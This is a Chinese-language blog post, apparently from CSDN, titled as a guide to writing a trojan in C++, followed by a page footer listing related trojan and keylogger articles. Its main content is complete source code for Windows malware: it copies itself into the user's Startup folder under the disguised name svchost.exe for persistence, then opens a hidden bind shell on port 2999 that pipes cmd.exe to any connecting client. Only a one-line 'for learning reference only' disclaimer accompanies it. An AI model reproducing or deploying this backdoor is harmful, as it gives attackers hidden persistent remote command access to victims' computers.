使用C++编写一个木马

已于 2024-07-16 08:55:37 修改
阅读量232 收藏
点赞数 3
分类专栏: 病毒(安全) 文章标签: c++ c语言 安全
于 2024-07-15 21:16:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/junos_123456/article/details/140449122
版权

如何通过C++实现一个木马功能

准备开发环境:windows11 + visual studio 2022 社区版本

通过将程序自身复制到windows自启动目录,实现持久化(当然还有其他方式,比如操作注册表,后续更新)

void cp()
{
	//获取当前用户的家目录
	const char GDPath[] = "USERPROFILE";
	char* path = nullptr;  //定义一个空指针
	size_t sz = 0;
	_dupenv_s(&path, &sz, GDPath);
	//将家目录和启动目录的绝对路径进行拼接,不同windows版本操作系统的启动目录是不一样的,需要进行调整
	if (path != nullptr) {
		char AutoPath[MAX_PATH];
		strcpy_s(AutoPath, path);
		strcat_s(AutoPath, "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe");
		
		//获取当前用户的绝对路径
		char currentPath[MAX_PATH];
		GetModuleFileName(NULL, currentPath, MAX_PATH);
        //文件复制
		CopyFile(currentPath, AutoPath, FALSE);		
		free(path); // 释放内存
	}
	else {
		cout << "Error: Unable to get environment variable." << endl;
	}
}

整个项目代码

#define _CRT_SECURE_NO_WARNINGS
#define _WINSOCK_DEPRECATED_NO_WARNINGS 
#pragma comment(lib,"ws2_32.lib")
//设置连接器选项
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#include <winsock2.h>
#include<windows.h>
#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#define MasterPort 2999 //定义监听端口
using namespace std;

void cp()
{
	const char GDPath[] = "USERPROFILE";
	char* path = nullptr;  //定义一个空指针
	size_t sz = 0;
	_dupenv_s(&path, &sz, GDPath);
	if (path != nullptr) {
		char AutoPath[MAX_PATH];
		strcpy_s(AutoPath, path);
		strcat_s(AutoPath, "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe");
		

		//获取当前用户的绝对路径
		char currentPath[MAX_PATH];
		GetModuleFileName(NULL, currentPath, MAX_PATH);

		CopyFile(currentPath, AutoPath, FALSE);
		free(path); // 释放内存
	}
	else {
		cout << "Error: Unable to get environment variable." << endl;
	}
}


void open_telnet() {
	WSADATA WSADa;//用来存储被WSAStartup函数调用后返回的win sockets数据
	sockaddr_in SockAddrin;
	SOCKET CSocket, SSocket;
	int AddrSize;
	PROCESS_INFORMATION Processinfo;
	STARTUPINFO Startupinfo;
	char szCMDPath[255];

	//配内存资源,初始化数据
	ZeroMemory(&Processinfo, sizeof(PROCESS_INFORMATION));
	ZeroMemory(&Startupinfo, sizeof(STARTUPINFO));
	ZeroMemory(&WSADa, sizeof(WSADATA));

	//获取CMD路径
	GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));

	//加载ws2_32.dll
	WSAStartup(0x202, &WSADa);

	//设置本地信息和绑定协议,建立socket
	SockAddrin.sin_family = AF_INET;
	SockAddrin.sin_addr.s_addr = INADDR_ANY;
	SockAddrin.sin_port = htons(MasterPort);
	CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

	//设置绑定断端口2999
	bind(CSocket, (sockaddr*)&SockAddrin, sizeof(SockAddrin));

	//设置服务器监听端口
	listen(CSocket, 1);
	AddrSize = sizeof(SockAddrin);

	//开始连接远程服务器,并配置隐藏窗口结构体
	SSocket = accept(CSocket, (sockaddr*)&SockAddrin, &AddrSize);
	Startupinfo.cb = sizeof(STARTUPINFO);
	Startupinfo.wShowWindow = SW_HIDE;
	Startupinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	Startupinfo.hStdInput = (HANDLE)SSocket;
	Startupinfo.hStdOutput = (HANDLE)SSocket;
	Startupinfo.hStdError = (HANDLE)SSocket;

	//创建匿名管道
	CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &Startupinfo, &Processinfo);
	WaitForSingleObject(Processinfo.hProcess, INFINITE);
	CloseHandle(Processinfo.hProcess);
	CloseHandle(Processinfo.hThread);

	//关闭进程句柄
	closesocket(CSocket);
	closesocket(SSocket);
	WSACleanup();
	//关闭连接卸载ws2_32.dll
}

int main(void)
{
	cp();//开启自启动
	open_telnet();//远程telnet	
	return 0;
}

仅供学习参考。
分享一个帮助写代码的工具,讯飞星火,类似于Chat-GPT。有什么问题可以在这里问问,还可以对代码进行查漏补缺。
在这里插入图片描述

引用

https://juejin.cn/post/7171999949301743652?searchId=20240715211226E2480F051F3DB7275A43

Junsir斗皇强者
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程控制源码,c++语言编写
08-25
本资源包含了一个C++编写的远程控制源码,适用于毕业设计或学习研究。 C++是一种通用的编程语言,以其强大的性能和灵活性而闻名,是开发系统软件和高性能应用的理想选择。对于远程控制程序,C++可以提供底层控制和...
C++木马病毒的查杀设计与实现(含源码)
01-28
总的来说,"C++木马病毒的查杀设计与实现"是一个综合性的实践项目,涵盖了软件工程的多个方面,旨在培养学生在安全领域的实战技能。通过深入研究和实现这个项目,不仅可以掌握病毒查杀技术,还能提升软件开发的综合...
c++木马程序之文件夹感染
云守护的专栏
03-07 2296
#include "resource.h" #include bool EnumDirectory(TCHAR *dirpath,bool isInject); void inject(char *path); bool WriteResourceToFile(char const *filename); void clear(char *path); bool FileExist(char *
VC++动态链接库编程之DLL木马
深之JohnChen的专栏
03-24 2847
VC++动态链接库编程之DLL木马来源: 天极网DLL在程序编制中可作出巨大贡献,它提供了具共性代码的复用能力。但是,正如一门高深的武学,若被掌握在正义之侠的手上,便可助其仗义江湖;但若被掌握在邪恶之徒的手上,则必然在江湖上掀起腥风血雨。DLL正是一种这样的武学。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木马,一种恶贯满盈的病毒,令特洛伊一夜之间国破家亡。 DLL木马
木马是如何编写
姜伟伟的专栏
12-18 1万+
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。  我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史
C++超级木马病毒
一个无聊的程序猿
08-16 1万+
提示 请再三考虑是否运行该C++程序,可能会造成电脑严重损害 #include<iostream> #include<stdlib.h> #include<conio.h> using namespace std; int main() { system("set User name"); while(1) { } return 0; }
简单木马编写
weixin_44540487的博客
08-09 2122
MINI木马编写 编写一个服务端,服务端开启远程后门 客户端使用telnet命令来操控该木马 先进行服务段的编写 WSADATA wsaData; SOCKET ServiceSocket,ClientSocket; SOCKADDR_IN SockAddr; int SockAddrSize; WSAStartup(MAKEWORD(2, 2), &wsaData); SockAddr.sin_family = AF_INET; SockAddr.sin_addr.S_un.S_add
C++ 编写的杀毒软件
01-17
本项目使用C++编写,提供了自定义特征的功能,这允许开发者或用户根据特定需求定制扫描规则。 在C++中开发杀毒软件涉及以下几个核心知识点: 1. **内存管理**:C++提供了直接内存操作的能力,这对于高效地读取和...
键盘记录器(运用C++编写
12-03
本项目是用C++编程语言实现的一个键盘记录器,它能够捕获用户的输入并将其保存到文件中,以便后续分析。 首先,我们要理解C++是通用、面向对象的编程语言,以其高效性和灵活性著称。在C++编写键盘记录器涉及到几...
c++木马编程
云守护的专栏
03-05 3996
1、消息炸弹 #define UNICODE #define _UNICODE #include #include #include #include //消息炸弹 #pragma comment(lib, "Netapi32.lib") // 加载Netapi32.lib库 void main(int argc, wchar_t *argv[]) { TC
C++打造木马程序太牛掰了!堪称计算机的“致命武器”
07-05 2018
C++ 实现简单远程监空木马源代码,这是一个学生的课程设计,远程监控木马源码,利用钩子实现,里面有非常详细的说明文档,对与想深入学习hook 和 进程快照还有指令分析器的人来说本作品最适合,里面的代码十分复杂,建议你们想学习的话最好详细阅读课程设计的文档。 项目结构截图: 源码截图: 测试效果图: 还是需要告诫Android用户,不要随意安装来源不明的应用,虽...
基于C/C++socket通信的后台木马程序
热门推荐
单核CPU的小朋友的博客
09-09 5万+
基于C/C++socket通信的后台木马程序 什么是socket通信? 网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket。 建立网络通信连接至少要一对端口号(socket)。socket本质是编程接口(API),对TCP/IP的封装,TCP/IP也要提供可供程序员做网络开发所用的接口,这就是Socket编程接口;HTTP是轿车,提供了封装或...
C++编写木马全过程
weixin_40286351的博客
01-04 3837
首先是&lt;FONT color=magenta  size=5&gt;工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在&lt;FONT color=magenta  size=5&gt;的基本原理上,我们选用可视化的BCB;Delphi也不错,...
C语言 之 理解指针(1)
fallzzzzz的博客
07-20 1134
就是先获取该数组的首元素的地址,从前面我们知道,指针的类型的作用是指针+1 所跳过的字节数,int为整形,大小为4个字节,所以p+1就跳过4个字节,p+2就跳过8个字节,计算机的CPU(中央处理器)在处理数据的时候,需要的数据是在内存中读取的,处理后数据也会放回内存中,如果想对这些空间进行高效的管理,就可以。并且我们知道,数组的元素存放是随着下标增长,内存地址变大的。上面的代码创建了一个整型变量n,因为一个整形的大小是4个字节,所以内存中申请了4个字节,⽤于存放整数10,其中每个字节都有地址。
商品信息管理系统(C语言)
最新发布
zeyeqianli的博客
07-22 330
该案例使用C语言中最具特色的结构体,将每个商品的所有信息存在结构体中,并且定义一个结构体类型的数组保存所有商品的信息,并且按照模块化的编程思想,将要实现的每个功能编写成独立的函数,这样即方便阅读同时也方便差错修改。该系统的主要功能如下:(1) 登录系统。(2) 创建商品信息。(3) 打印商品信息。(4) 查询商品信息。(5) 修改商品信息。(6) 删除商品信息。(7) 商品价格排名显示。(8) 退出系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值